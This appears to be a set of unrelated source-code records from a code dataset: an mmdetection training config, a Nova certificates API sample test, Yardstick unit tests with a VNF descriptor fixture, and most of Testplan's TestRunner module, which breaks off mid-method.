planes=(256, 128, 64),
down_ratio_b1=8,
down_ratio_b2=4,
hm_head_channels=(128, 64),
wh_head_channels=(32, 32),
hm_head_conv_num=(2, 2),
wh_head_conv_num=(3, 3),
num_classes=81,
wh_scale_factor_b1=16.,
wh_scale_factor_b2=8.,
shortcut_cfg=(1, 2, 3),
alpha=0.6,
beta=0.6,
max_objs=128,
hm_weight_b1=1.,
wh_weight_b1=5.,
hm_weight_b2=1.,
wh_weight_b2=5.,
b1_min_length=64,
b2_max_length=64,
mdcn_before_s8=True,
inf_branch=['b1', 'b2'],
use_simple_nms=True,
conv_cfg=None,
norm_cfg=dict(type='BN')))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(debug=False)
test_cfg = dict(score_thr=0.01, max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(512, 512), keep_ratio=False),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(512, 512),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=False),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=16,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='SGD',
lr=0.002,
momentum=0.9,
weight_decay=0.0004,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[9, 11])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=9)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ttfv2net_r18_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
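# This file is an mmdetection-style config and is consumed by the framework's
# entry points rather than imported directly. A common invocation (script path
# and flags assumed, they vary between mmdetection versions) looks like:
#   python tools/train.py configs/ttfnet/ttfv2net_r18_1x.py --gpus 8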
|
the-stack_0_25176
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class CertificatesSamplesJsonTest(api_sample_base.ApiSampleTestBaseV3):
extension_name = "os-certificates"
def _get_flags(self):
f = super(CertificatesSamplesJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.certificates.Certificates')
return f
def test_create_certificates(self):
response = self._do_post('os-certificates',
'certificate-create-req', {})
subs = self._get_regexes()
self._verify_response('certificate-create-resp', subs, response, 200)
def test_get_root_certificate(self):
response = self._do_get('os-certificates/root')
subs = self._get_regexes()
self._verify_response('certificate-get-root-resp', subs, response, 200)
|
the-stack_0_25180
|
# Copyright (c) 2016-2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import os
import mock
import unittest
from yardstick.network_services.vnf_generic.vnf import base
from yardstick.ssh import SSH
from yardstick.tests.unit import base as ut_base
IP_PIPELINE_CFG_FILE_TPL = ("arp_route_tbl = ({port0_local_ip_hex},"
"{port0_netmask_hex},1,{port1_local_ip_hex}) "
"({port1_local_ip_hex},{port1_netmask_hex},0,"
"{port0_local_ip_hex})")
IP_PIPELINE_ND_CFG_FILE_TPL = """
nd_route_tbl = ({port1_dst_ip_hex6},"""
"""{port1_dst_netmask_hex6},1,{port1_dst_ip_hex6})"""
_LOCAL_OBJECT = object()
VNFD_0 = {
'short-name': 'VpeVnf',
'vdu': [
{
'routing_table': [
{
'network': '152.16.100.20',
'netmask': '255.255.255.0',
'gateway': '152.16.100.20',
'if': 'xe0'
},
{
'network': '152.16.40.20',
'netmask': '255.255.255.0',
'gateway': '152.16.40.20',
'if': 'xe1'
},
],
'description': 'VPE approximation using DPDK',
'name': 'vpevnf-baremetal',
'nd_route_tbl': [
{
'network': '0064:ff9b:0:0:0:0:9810:6414',
'netmask': '112',
'gateway': '0064:ff9b:0:0:0:0:9810:6414',
'if': 'xe0'
},
{
'network': '0064:ff9b:0:0:0:0:9810:2814',
'netmask': '112',
'gateway': '0064:ff9b:0:0:0:0:9810:2814',
'if': 'xe1'
},
],
'id': 'vpevnf-baremetal',
'external-interface': [
{
'virtual-interface': {
'dst_mac': '00:00:00:00:00:03',
'vpci': '0000:05:00.0',
'local_ip': '152.16.100.19',
'type': 'PCI-PASSTHROUGH',
'netmask': '255.255.255.0',
'dpdk_port_num': 0,
'bandwidth': '10 Gbps',
'dst_ip': '152.16.100.20',
'local_mac': '00:00:00:00:00:01'
},
'vnfd-connection-point-ref': 'xe0',
'name': 'xe0'
},
{
'virtual-interface': {
'dst_mac': '00:00:00:00:00:04',
'vpci': '0000:05:00.1',
'local_ip': '152.16.40.19',
'type': 'PCI-PASSTHROUGH',
'netmask': '255.255.255.0',
'dpdk_port_num': 1,
'bandwidth': '10 Gbps',
'dst_ip': '152.16.40.20',
'local_mac': '00:00:00:00:00:02'
},
'vnfd-connection-point-ref': 'xe1',
'name': 'xe1'
},
],
},
],
'description': 'Vpe approximation using DPDK',
'mgmt-interface': {
'vdu-id': 'vpevnf-baremetal',
'host': '1.1.1.1',
'password': 'r00t',
'user': 'root',
'ip': '1.1.1.1'
},
'benchmark': {
'kpi': [
'packets_in',
'packets_fwd',
'packets_dropped',
],
},
'connection-point': [
{
'type': 'VPORT',
'name': 'xe0',
},
{
'type': 'VPORT',
'name': 'xe1',
},
],
'id': 'VpeApproxVnf', 'name': 'VPEVnfSsh'
}
VNFD = {
'vnfd:vnfd-catalog': {
'vnfd': [
VNFD_0,
]
}
}
class FileAbsPath(object):
def __init__(self, module_file):
super(FileAbsPath, self).__init__()
self.module_path = os.path.dirname(os.path.abspath(module_file))
def get_path(self, filename):
file_path = os.path.join(self.module_path, filename)
return file_path
def mock_ssh(mock_ssh_type, spec=None, exec_result=_LOCAL_OBJECT, run_result=_LOCAL_OBJECT):
if spec is None:
spec = SSH
if exec_result is _LOCAL_OBJECT:
exec_result = 0, "", ""
if run_result is _LOCAL_OBJECT:
run_result = 0, "", ""
mock_ssh_instance = mock.Mock(autospec=spec)
mock_ssh_instance._get_client.return_value = mock.Mock()
mock_ssh_instance.execute.return_value = exec_result
mock_ssh_instance.run.return_value = run_result
mock_ssh_type.from_node.return_value = mock_ssh_instance
return mock_ssh_instance
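# Minimal usage sketch for the helper above: pass a mocked SSH *class* and the
# helper wires up from_node() to return a stub whose execute()/run() results
# you control. The names below are test-local assumptions.
#   ssh_type = mock.Mock()
#   ssh_stub = mock_ssh(ssh_type, exec_result=(0, "stdout", ""))
#   assert ssh_type.from_node.return_value is ssh_stub
#   assert ssh_stub.execute("uname")[0] == 0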
class TestQueueFileWrapper(unittest.TestCase):
def setUp(self):
self.prompt = "pipeline>"
self.q_in = multiprocessing.Queue()
self.q_out = multiprocessing.Queue()
def test___init__(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
self.assertEqual(queue_file_wrapper.prompt, self.prompt)
def test_clear(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.bufsize = 5
queue_file_wrapper.write("pipeline>")
queue_file_wrapper.close()
self.assertIsNone(queue_file_wrapper.clear())
self.assertIsNotNone(queue_file_wrapper.q_out.empty())
def test_close(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
self.assertIsNone(queue_file_wrapper.close())
def test_read(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.q_in.put("pipeline>")
self.assertEqual("pipeline>", queue_file_wrapper.read(20))
def test_write(self):
queue_file_wrapper = \
base.QueueFileWrapper(self.q_in, self.q_out, self.prompt)
queue_file_wrapper.write("pipeline>")
self.assertIsNotNone(queue_file_wrapper.q_out.empty())
class TestGenericVNF(ut_base.BaseUnitTestCase):
def test_definition(self):
"""Make sure that the abstract class cannot be instantiated"""
with self.assertRaises(TypeError) as exc:
# pylint: disable=abstract-class-instantiated
base.GenericVNF('vnf1', VNFD['vnfd:vnfd-catalog']['vnfd'][0])
msg = ("Can't instantiate abstract class GenericVNF with abstract "
"methods collect_kpi, instantiate, scale, start_collect, "
"stop_collect, terminate, wait_for_instantiate")
self.assertEqual(msg, str(exc.exception))
class GenericTrafficGenTestCase(ut_base.BaseUnitTestCase):
def test_definition(self):
"""Make sure that the abstract class cannot be instantiated"""
vnfd = VNFD['vnfd:vnfd-catalog']['vnfd'][0]
name = 'vnf1'
with self.assertRaises(TypeError) as exc:
# pylint: disable=abstract-class-instantiated
base.GenericTrafficGen(name, vnfd)
msg = ("Can't instantiate abstract class GenericTrafficGen with "
"abstract methods collect_kpi, instantiate, run_traffic, "
"scale, terminate")
self.assertEqual(msg, str(exc.exception))
|
the-stack_0_25181
|
"""Tests runner module."""
import os
import random
import time
import datetime
import webbrowser
from collections import OrderedDict
import pytz
from schema import Or, And, Use
from testplan import defaults
from testplan.common.config import ConfigOption
from testplan.common.entity import (
RunnableConfig,
RunnableStatus,
RunnableResult,
Runnable,
)
from testplan.common.exporters import BaseExporter, ExporterResult
from testplan.common.report import MergeError
from testplan.common.utils import logger
from testplan.common.utils import strings
from testplan.common.utils.path import default_runpath
from testplan.exporters import testing as test_exporters
from testplan.report import (
TestReport,
TestGroupReport,
Status,
ReportCategories,
)
from testplan.report.testing.styles import Style
from testplan.runnable.interactive import TestRunnerIHandler
from testplan.runners.base import Executor
from testplan.runners.pools.tasks import Task, TaskResult
from testplan.testing import listing, filtering, ordering, tagging
from testplan.testing.base import TestResult
def get_exporters(values):
"""
Validation function for exporter declarations.
:param values: Single or a list of exporter declaration(s).
:return: List of initialized exporter objects.
"""
def get_exporter(value):
if isinstance(value, BaseExporter):
return value
elif isinstance(value, tuple):
exporter_cls, params = value
return exporter_cls(**params)
raise TypeError("Invalid exporter value: {}".format(value))
if values is None:
return []
elif isinstance(values, list):
return [get_exporter(v) for v in values]
return [get_exporter(values)]
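# Illustrative calls: declarations may be exporter instances or
# (exporter_class, kwargs) tuples, mirroring how get_default_exporters()
# below instantiates them with no arguments.
#   get_exporters(test_exporters.JSONExporter())         # -> [<JSONExporter>]
#   get_exporters([(test_exporters.PDFExporter, {})])    # -> [<PDFExporter>]
#   get_exporters(None)                                  # -> []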
def result_for_failed_task(original_result):
"""
    Create a new result entry for an invalid result retrieved from a resource.
"""
result = TestResult()
result.report = TestGroupReport(
name=original_result.task.name, category=ReportCategories.ERROR
)
attrs = [attr for attr in original_result.task.all_attrs]
result_lines = [
"{}: {}".format(attr, getattr(original_result.task, attr))
if getattr(original_result.task, attr, None)
else ""
for attr in attrs
]
result.report.logger.error(
os.linesep.join([line for line in result_lines if line])
)
result.report.logger.error(original_result.reason)
result.report.status_override = Status.ERROR
return result
class TestRunnerConfig(RunnableConfig):
"""
Configuration object for
:py:class:`~testplan.runnable.TestRunner` runnable object.
"""
ignore_extra_keys = True
@classmethod
def get_options(cls):
return {
"name": str,
ConfigOption("description", default=None): Or(str, None),
ConfigOption("logger_level", default=logger.TEST_INFO): int,
ConfigOption("file_log_level", default=logger.DEBUG): int,
ConfigOption("runpath", default=default_runpath): Or(
None, str, lambda x: callable(x)
),
ConfigOption("path_cleanup", default=True): bool,
ConfigOption("all_tasks_local", default=False): bool,
ConfigOption(
"shuffle", default=[]
): list, # list of string choices
ConfigOption(
"shuffle_seed", default=float(random.randint(1, 9999))
): float,
ConfigOption("exporters", default=None): Use(get_exporters),
ConfigOption("stdout_style", default=defaults.STDOUT_STYLE): Style,
ConfigOption("report_dir", default=defaults.REPORT_DIR): Or(
str, None
),
ConfigOption("xml_dir", default=None): Or(str, None),
ConfigOption("pdf_path", default=None): Or(str, None),
ConfigOption("json_path", default=None): Or(str, None),
ConfigOption("http_url", default=None): Or(str, None),
ConfigOption("pdf_style", default=defaults.PDF_STYLE): Style,
ConfigOption("report_tags", default=[]): [
Use(tagging.validate_tag_value)
],
ConfigOption("report_tags_all", default=[]): [
Use(tagging.validate_tag_value)
],
ConfigOption("merge_scheduled_parts", default=False): bool,
ConfigOption("browse", default=False): bool,
ConfigOption("ui_port", default=None): Or(None, int),
ConfigOption(
"web_server_startup_timeout",
default=defaults.WEB_SERVER_TIMEOUT,
): int,
ConfigOption(
"test_filter", default=filtering.Filter()
): filtering.BaseFilter,
ConfigOption(
"test_sorter", default=ordering.NoopSorter()
): ordering.BaseSorter,
# Test lister is None by default, otherwise Testplan would
# list tests, not run them
ConfigOption("test_lister", default=None): Or(
None, listing.BaseLister
),
ConfigOption("verbose", default=False): bool,
ConfigOption("debug", default=False): bool,
ConfigOption("timeout", default=defaults.TESTPLAN_TIMEOUT): Or(
None, And(int, lambda t: t >= 0)
),
ConfigOption("abort_wait_timeout", default=60): int,
ConfigOption(
"interactive_handler", default=TestRunnerIHandler
): object,
ConfigOption("extra_deps", default=[]): list,
ConfigOption("label", default=None): Or(None, str),
}
class TestRunnerStatus(RunnableStatus):
"""
Status of a
:py:class:`TestRunner <testplan.runnable.TestRunner>` runnable object.
"""
class TestRunnerResult(RunnableResult):
"""
Result object of a
:py:class:`TestRunner <testplan.runnable.TestRunner>` runnable object.
"""
def __init__(self):
super(TestRunnerResult, self).__init__()
self.test_results = OrderedDict()
self.exporter_results = []
self.test_report = None
@property
def report(self):
"""Tests report."""
return self.test_report
@property
def success(self):
"""Run was successful."""
return not self.test_report.failed and all(
[
exporter_result.success
for exporter_result in self.exporter_results
]
)
class TestRunner(Runnable):
r"""
Adds tests to test
:py:class:`executor <testplan.runners.base.Executor>` resources
and invoke report
:py:class:`exporter <testplan.exporters.testing.base.Exporter>` objects
to create the
:py:class:`~testplan.runnable.TestRunnerResult`.
:param name: Name of test runner.
:type name: ``str``
:param description: Description of test runner.
:type description: ``str``
:param logger_level: Logger level for stdout.
:type logger_level: ``int``
    :param file_log_level: Logger level for file.
:type file_log_level: ``int``
:param runpath: Input runpath.
:type runpath: ``str`` or ``callable``
:param path_cleanup: Clean previous runpath entries.
:type path_cleanup: ``bool``
:param all_tasks_local: Schedule all tasks in local pool
:type all_tasks_local: ``bool``
:param shuffle: Shuffle strategy.
:type shuffle: ``list`` of ``str``
:param shuffle_seed: Shuffle seed.
:type shuffle_seed: ``float``
:param exporters: Exporters for reports creation.
:type exporters: ``list``
:param stdout_style: Styling output options.
:type stdout_style:
:py:class:`Style <testplan.report.testing.styles.Style>`
:param report_dir: Report directory.
:type report_dir: ``str``
:param xml_dir: XML output directory.
:type xml_dir: ``str``
:param pdf_path: PDF output path <PATH>/\*.pdf.
:type pdf_path: ``str``
:param json_path: JSON output path <PATH>/\*.json.
:type json_path: ``str``
:param pdf_style: PDF creation styling options.
:type pdf_style: :py:class:`Style <testplan.report.testing.styles.Style>`
:param http_url: Web url for posting test report.
:type http_url: ``str``
:param report_tags: Matches tests marked with any of the given tags.
:type report_tags: ``list``
:param report_tags_all: Match tests marked with all of the given tags.
:type report_tags_all: ``list``
:param merge_scheduled_parts: Merge report of scheduled MultiTest parts.
:type merge_scheduled_parts: ``bool``
:param browse: Open web browser to display the test report.
:type browse: ``bool`` or ``NoneType``
:param ui_port: Port of web server for displaying test report.
:type ui_port: ``int`` or ``NoneType``
:param web_server_startup_timeout: Timeout for starting web server.
:type web_server_startup_timeout: ``int``
:param test_filter: Tests filtering class.
:type test_filter: Subclass of
:py:class:`BaseFilter <testplan.testing.filtering.BaseFilter>`
:param test_sorter: Tests sorting class.
:type test_sorter: Subclass of
:py:class:`BaseSorter <testplan.testing.ordering.BaseSorter>`
:param test_lister: Tests listing class.
:type test_lister: Subclass of
:py:class:`BaseLister <testplan.testing.listing.BaseLister>`
:param verbose: Enable or disable verbose mode.
:type verbose: ``bool``
:param debug: Enable or disable debug mode.
:type debug: ``bool``
:param timeout: Timeout value for test execution.
:type timeout: ``NoneType`` or ``int`` (greater than 0).
:param abort_wait_timeout: Timeout for test runner abort.
:type abort_wait_timeout: ``int``
:param interactive_handler: Handler for interactive mode execution.
    :type interactive_handler: Subclass of
        :py:class:`TestRunnerIHandler <testplan.runnable.interactive.TestRunnerIHandler>`
:param extra_deps: Extra module dependencies for interactive reload.
:type extra_deps: ``list`` of ``module``
Also inherits all
:py:class:`~testplan.common.entity.base.Runnable` options.
"""
CONFIG = TestRunnerConfig
STATUS = TestRunnerStatus
RESULT = TestRunnerResult
def __init__(self, **options):
super(TestRunner, self).__init__(**options)
self._tests = OrderedDict() # uid to resource, in definition order
self._part_instance_names = set() # name of Multitest part
self._result.test_report = TestReport(
name=self.cfg.name,
description=self.cfg.description,
uid=self.cfg.name,
timeout=self.cfg.timeout,
label=self.cfg.label,
)
self._exporters = None
self._web_server_thread = None
self._file_log_handler = None
self._configure_stdout_logger()
# Before saving test report, recursively generate unique strings in
# uuid4 format as report uid instead of original one. Skip this step
# when executing unit/functional tests or running in interactive mode.
self._reset_report_uid = self.cfg.interactive_port is None
@property
def report(self):
"""Tests report."""
return self._result.test_report
@property
def exporters(self):
"""
Return a list of
:py:class:`Resources <testplan.exporters.testing.base.Exporter>`.
"""
if self._exporters is None:
self._exporters = self.get_default_exporters()
if self.cfg.exporters:
self._exporters.extend(self.cfg.exporters)
for exporter in self._exporters:
if hasattr(exporter, "cfg"):
exporter.cfg.parent = self.cfg
exporter.parent = self
return self._exporters
def get_default_exporters(self):
"""
        Instantiate certain exporters if the related command-line argument
        (e.g. --pdf) or programmatic argument (e.g. pdf_path) is passed but
        no exporter declarations are present.
"""
exporters = []
if self.cfg.pdf_path:
exporters.append(test_exporters.PDFExporter())
if self.cfg.report_tags or self.cfg.report_tags_all:
exporters.append(test_exporters.TagFilteredPDFExporter())
if self.cfg.json_path:
exporters.append(test_exporters.JSONExporter())
if self.cfg.xml_dir:
exporters.append(test_exporters.XMLExporter())
if self.cfg.http_url:
exporters.append(test_exporters.HTTPExporter())
if self.cfg.ui_port is not None:
exporters.append(
test_exporters.WebServerExporter(ui_port=self.cfg.ui_port)
)
return exporters
def add_environment(self, env, resource=None):
"""
Adds an environment to the target resource holder.
:param env: Environment creator instance.
:type env: Subclass of
:py:class:`~testplan.environment.EnvironmentCreator`
:param resource: Target environments holder resource.
        :type resource: Subclass of
:py:class:`~testplan.environment.Environments`
:return: Environment uid.
:rtype: ``str``
"""
resource = (
self.resources[resource]
if resource
else self.resources.environments
)
target = env.create(parent=self)
env_uid = env.uid()
resource.add(target, env_uid)
return env_uid
def add_resource(self, resource, uid=None):
"""
Adds a test
:py:class:`executor <testplan.runners.base.Executor>`
resource in the test runner environment.
:param resource: Test executor to be added.
:type resource: Subclass of :py:class:`~testplan.runners.base.Executor`
:param uid: Optional input resource uid.
:type uid: ``str``
:return: Resource uid assigned.
:rtype: ``str``
"""
resource.parent = self
resource.cfg.parent = self.cfg
return self.resources.add(
resource, uid=uid or getattr(resource, "uid", strings.uuid4)()
)
def schedule(self, task=None, resource=None, **options):
"""
Schedules a serializable
:py:class:`~testplan.runners.pools.tasks.base.Task` in a task runner
:py:class:`~testplan.runners.pools.base.Pool` executor resource.
        :param task: Input task.
        :type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
        :param resource: Target pool resource.
        :type resource: :py:class:`~testplan.runners.pools.base.Pool`
        :param options: Task input options.
        :type options: ``dict``
:return uid: Assigned uid for task.
:rtype: ``str``
"""
return self.add(task or Task(**options), resource=resource)
def add(self, target, resource=None):
"""
Adds a :py:class:`runnable <testplan.common.entity.base.Runnable>`
test entity, or a :py:class:`~testplan.runners.pools.tasks.base.Task`,
or a callable that returns a test entity to a
:py:class:`~testplan.runners.base.Executor` resource.
:param target: Test target.
:type target: :py:class:`~testplan.common.entity.base.Runnable` or
:py:class:`~testplan.runners.pools.tasks.base.Task` or ``callable``
:param resource: Test executor resource.
:type resource: :py:class:`~testplan.runners.base.Executor`
:return: Assigned uid for test.
        :rtype: ``str`` or ``NoneType``
"""
local_runner = self.resources.first()
resource = resource or local_runner
if resource not in self.resources:
raise RuntimeError(
'Resource "{}" does not exist.'.format(resource)
)
# Get the real test entity and verify if it should be added
runnable = self._verify_test_target(target)
if not runnable:
return None
uid = runnable.uid()
part = getattr(getattr(runnable, "cfg", {"part": None}), "part", None)
        # The uid of a test entity MUST be unique; generally it is the same as
        # the entity's name. When a test entity is split into multiple parts,
        # its uid will change (e.g. gain a postfix), but its name must still
        # differ from the uids of all non-part entities, and its uid cannot be
        # the same as the name of any test entity.
if uid in self._tests:
raise ValueError(
'{} with uid "{}" already added.'.format(self._tests[uid], uid)
)
if uid in self._part_instance_names:
raise ValueError(
'Multitest part named "{}" already added.'.format(uid)
)
if part:
if runnable.name in self._tests:
raise ValueError(
'{} with uid "{}" already added.'.format(
self._tests[runnable.name], runnable.name
)
)
self._part_instance_names.add(runnable.name)
# When running interactively, add all real test entities into the local
# runner even if they were scheduled into a pool. It greatly simplifies
# the interactive runner if it only has to deal with the local runner.
if self.cfg.interactive_port is not None:
self._tests[uid] = local_runner
self.resources[local_runner].add(runnable, uid)
return uid
        # Reset the task uid, which will be used for test result transport in
        # a pool executor; this makes logging and debugging easier.
if isinstance(target, Task):
target._uid = uid
        # In batch mode the original target is added into executors; it can be:
        # 1> A runnable object (generally a test entity, or customized by user)
        # 2> A callable that returns a runnable object
        # 3> A task that wraps a runnable object
self._tests[uid] = resource
self.resources[resource].add(target, uid)
return uid
def _verify_test_target(self, target):
"""
Determines if a test target should be added for execution.
Returns the real test entity if it should run, otherwise None.
"""
        # The target added into TestRunner can be: 1> a real test entity
        # 2> a task that wraps a test entity 3> a callable that returns a test entity
if isinstance(target, Runnable):
runnable = target
elif isinstance(target, Task):
runnable = target.materialize()
elif callable(target):
runnable = target()
else:
raise TypeError(
"Unrecognized test target of type {}".format(type(target))
)
if isinstance(runnable, Runnable):
runnable.parent = self
runnable.cfg.parent = self.cfg
if type(self.cfg.test_filter) is not filtering.Filter:
should_run = runnable.should_run()
self.logger.debug(
"Should run %s? %s",
runnable.name,
"Yes" if should_run else "No",
)
if not should_run:
return None
# "--list" option means always not executing tests
if self.cfg.test_lister is not None:
self.cfg.test_lister.log_test_info(runnable)
return None
return runnable
def _add_step(self, step, *args, **kwargs):
if self.cfg.test_lister is None:
super(TestRunner, self)._add_step(step, *args, **kwargs)
def _record_start(self):
self.report.timer.start("run")
def _record_end(self):
self.report.timer.end("run")
def make_runpath_dirs(self):
super(TestRunner, self).make_runpath_dirs()
self.logger.test_info("Testplan runpath: {}".format(self.runpath))
def pre_resource_steps(self):
"""Steps to be executed before resources started."""
# self._add_step(self._runpath_initialization)
self._add_step(self._record_start)
self._add_step(self.make_runpath_dirs)
self._add_step(self._configure_file_logger)
def main_batch_steps(self):
"""Steps to be executed while resources are running."""
self._add_step(self._wait_ongoing)
def post_resource_steps(self):
"""Steps to be executed after resources stopped."""
self._add_step(self._create_result)
self._add_step(self._log_test_status)
self._add_step(self._record_end) # needs to happen before export
self._add_step(self._invoke_exporters)
self._add_step(self._post_exporters)
self._add_step(self._close_file_logger)
def _wait_ongoing(self):
# TODO: if a pool fails to initialize we could reschedule the tasks.
if self.resources.start_exceptions:
for resource, exception in self.resources.start_exceptions.items():
self.logger.critical(
"Aborting {} due to start exception:".format(resource)
)
self.logger.error(exception)
resource.abort()
_start_ts = (
self.result.test_report.timer["run"][0]
- datetime.datetime(1970, 1, 1, tzinfo=pytz.utc)
).total_seconds()
while self.active:
if self.cfg.timeout and time.time() - _start_ts > self.cfg.timeout:
self.result.test_report.logger.error(
"Timeout: Aborting execution after {} seconds".format(
self.cfg.timeout
)
)
                # Abort dependencies and wait for a while until test reports are ready
for dep in self.abort_dependencies():
self._abort_entity(dep)
time.sleep(self.cfg.abort_wait_timeout)
break
pending_work = False
for resource in self.resources:
# Check if any resource has pending work.
# Maybe print periodically the pending work of resource.
pending_work = resource.pending_work() or pending_work
# Poll the resource's health - if it has unexpectedly died
# then abort the entire test to avoid hanging.
if not resource.is_alive:
self.result.test_report.logger.critical(
"Aborting {} - {} unexpectedly died".format(
self, resource
)
)
self.abort()
self.result.test_report.status_override = Status.ERROR
if pending_work is False:
break
time.sleep(self.cfg.active_loop_sleep)
def _create_result(self):
"""Fetch task result from executors and create a full test result."""
step_result = True
test_results = self._result.test_results
test_report = self._result.test_report
test_rep_lookup = {}
for uid, resource in self._tests.items():
if not isinstance(self.resources[resource], Executor):
continue
resource_result = self.resources[resource].results.get(uid)
            # Tasks may not have been executed (i.e. timeout), although the
            # thread will wait for a buffer period until the follow-up work
            # finishes. But for insurance we assume some uids may still be missing.
if not resource_result:
continue
elif isinstance(resource_result, TaskResult):
if resource_result.status is False:
test_results[uid] = result_for_failed_task(resource_result)
else:
test_results[uid] = resource_result.result
else:
test_results[uid] = resource_result
run, report = test_results[uid].run, test_results[uid].report
if report.part:
if self.cfg.merge_scheduled_parts:
report.uid = report.name
                    # Save the report temporarily; it will be merged later
test_rep_lookup.setdefault(report.uid, []).append(
(test_results[uid].run, report)
)
if report.uid not in test_report.entry_uids:
# Create a placeholder for merging sibling reports
if isinstance(resource_result, TaskResult):
# `runnable` must be an instance of MultiTest since
# the corresponding report has `part` defined. Can
# get a full structured report by `dry_run` and the
# order of testsuites/testcases can be retained.
runnable = resource_result.task.materialize()
runnable.parent = self
runnable.cfg.parent = self.cfg
runnable.cfg._options["part"] = None
runnable._test_context = None
report = runnable.dry_run().report
else:
report = report.__class__(
report.name,
uid=report.uid,
category=report.category,
)
else:
continue # Wait all sibling reports collected
else:
# If do not want to merge sibling reports, then display
# them with different names. (e.g. `MTest - part(0/3)`)
report.name = report.uid
test_report.append(report)
step_result = step_result and run is True # boolean or exception
step_result = self._merge_reports(test_rep_lookup) and step_result
# Reset UIDs of the test report and all of its children in UUID4 format
if self._reset_report_uid:
test_report.reset_uid()
return step_result
def _merge_reports(self, test_report_lookup):
"""
Merge report of MultiTest parts into test runner report.
Return True if all parts are found and can be successfully merged.
Format of test_report_lookup:
{
'report_uid_1': [
(True, report_1_part_1), (True, report_1_part_2), ...
],
'report_uid_2': [
(True, report_2_part_1), (False, report_2_part_2), ...
],
...
}
"""
merge_result = True
for uid, result in test_report_lookup.items():
placeholder_report = self._result.test_report.get_by_uid(uid)
num_of_parts = 0
part_indexes = set()
merged = False
with placeholder_report.logged_exceptions():
for run, report in result:
if num_of_parts and num_of_parts != report.part[1]:
raise ValueError(
"Cannot merge parts for child report with"
" `uid`: {uid}, invalid parameter of part"
" provided.".format(uid=uid)
)
elif report.part[0] in part_indexes:
raise ValueError(
"Cannot merge parts for child report with"
" `uid`: {uid}, duplicate MultiTest parts"
" had been scheduled.".format(uid=uid)
)
else:
part_indexes.add(report.part[0])
num_of_parts = report.part[1]
if run:
if isinstance(run, Exception):
raise run
else:
placeholder_report.merge(report, strict=False)
else:
raise MergeError(
"Cannot merge parts for child report with"
" `uid`: {uid}, at least one part (index:{part})"
" didn't run.".format(uid=uid, part=report.part[0])
)
else:
if len(part_indexes) < num_of_parts:
raise MergeError(
"Cannot merge parts for child report with"
" `uid`: {uid}, not all MultiTest parts"
" had been scheduled.".format(uid=uid)
)
merged = True
            # If the sibling reports fail to merge, clear the placeholder report
            # but keep error logs; sibling reports will be appended at the end.
if not merged:
placeholder_report.entries = []
placeholder_report._index = {}
placeholder_report.status_override = Status.ERROR
for _, report in result:
report.name = "{} - part({}/{})".format(
report.name, report.part[0], report.part[1]
)
report.uid = strings.uuid4() # considered as error report
self._result.test_report.append(report)
merge_result = (
merge_result and placeholder_report.status != Status.ERROR
)
return merge_result
def uid(self):
"""Entity uid."""
return self.cfg.name
def _log_test_status(self):
if not self._result.test_report.entries:
self.logger.warning(
"No tests were run - check your filter patterns."
)
self._result.test_report.status_override = Status.FAILED
else:
